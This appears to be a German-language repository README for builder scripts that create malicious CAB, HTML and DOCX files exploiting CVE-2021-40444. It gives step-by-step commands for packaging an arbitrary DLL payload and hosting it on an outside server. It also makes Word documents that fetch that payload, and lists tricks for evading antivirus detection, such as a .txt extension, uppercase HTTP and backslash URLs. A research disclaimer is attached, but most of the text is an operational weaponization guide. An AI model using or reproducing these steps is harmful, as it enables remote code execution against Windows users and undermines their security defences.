
Dieses Repository enthält Builder für CAB-Dateien, HTML-Dateien und DOCX-Dateien für den Exploit CVE-2021-40444.
CVE-2021-40444 Builder
Dieses Repository enthält Builder für CAB-Dateien, HTML-Dateien und DOCX-Dateien für den Exploit CVE-2021-40444. Dieses Repository dient ausschließlich Test-, Forschungs- und Bildungszwecken. Du bist selbst dafür verantwortlich, wie du den Code aus diesem Repository verwendest.
Der Code wurde durch Reverse Engineering von Malware-Beispielen entwickelt, die in freier Wildbahn gefunden und von verschiedenen Sicherheitsforschern geteilt wurden.
Die Builder für diese CVE sind bereits öffentlich. Der Zweck dieses Repositorys ist es zu überprüfen, wie effektiv wir statische Erkennungen verschiedener AV-Anbieter für die DOCX-Dateien umgehen können, zum Zeitpunkt der Erstellung.
Der JS-Code kann leicht mit Online-Tools oder manuell verschleiert werden. Die DOCX-Datei enthält jedoch nur eine Datei, document.xml.rels, auf der die Signaturen basieren können. Was können wir darin manipulieren, um statische Erkennungen der meisten AVs zu umgehen.
cabrc.exe ist eine Microsoft-EXE-Datei, die im Internet Explorer Administration Kit enthalten ist und von https://docs.microsoft.com/en-us/internet-explorer/ie11-ieak/ieak-information-and-downloads heruntergeladen werden kann. Nach der Installation findest du diese EXE-Datei unter "C:\Program Files (x86)\Windows IEAK 11".
Es gibt 3 Builder.
Der Code funktioniert mit Python 2.7.
Gehe zuerst zum Ordner CVE-2021-40444 und platziere dort deine DLL-Datei und benenne sie in IEcache.inf um (oder du kannst die bereits vorhandene Calc-DLL verwenden).
Gehe dann zum Quellordner und generiere die CAB-Datei.
c:\cve-2021-40444\sources\python generate_cab.py
Lade deine CAB-Datei hoch und generiere mit der URL der CAB-Datei die HTML-Datei.
c:\cve-2021-40444\sources\python generate_html.py http://192.168.1.12/new/winupdate.cab tests.txt (Hinweis: Wenn wir statt der HTML-Erweiterung .txt verwenden, funktioniert der Exploit immer noch, umgeht aber AV.)
Lade nun schließlich deine HTML-Datei hoch und generiere die DOC-Datei. Verwende HTTP (Großbuchstaben) anstelle von http und "" anstelle von "/", um AV zu umgehen. Und wir brauchen auch kein x-usc:.
Beispiel: c:\cve-2021-40444\sources\python generate_doc.py HTTP:\\192.168.1.12\new\tests.txt
Das Ergebnis liegt vor dir.


www.aslitsecurity.com
[email protected]